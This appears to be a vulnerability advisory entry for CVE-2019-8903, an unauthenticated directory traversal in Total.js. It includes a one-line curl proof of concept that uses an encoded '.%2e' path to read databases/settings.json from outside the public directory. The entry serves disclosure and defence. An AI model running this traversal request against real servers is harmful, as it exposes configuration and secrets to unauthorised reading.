Attacker Value: High (1 user assessed)
Exploitability: Very High (1 user assessed)
User Interaction: Unknown
Privileges Required: Unknown
Attack Vector: Unknown

Total.js requestcontinue Directory Traversal Vulnerability

Disclosure Date: February 18, 2019. Last updated: November 13, 2019.

Description

Total.js is prone to a directory traversal vulnerability. Attackers can exploit this issue and read files remotely.

Technical Analysis

Totaljs – Unauthenticated Directory Traversal

DESCRIPTION
A user can make requests like "GET /../databases/settings.json HTTP/1.1" and include file contents from outside the /public directory, which is the default directory for accessible static files.

Refer:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8903

PROOF OF CONCEPT

$ curl -v --path-as-is http://127.0.0.1:8000/.%2e/databases/settings.json

# (note that .json is in the extensions list by default)
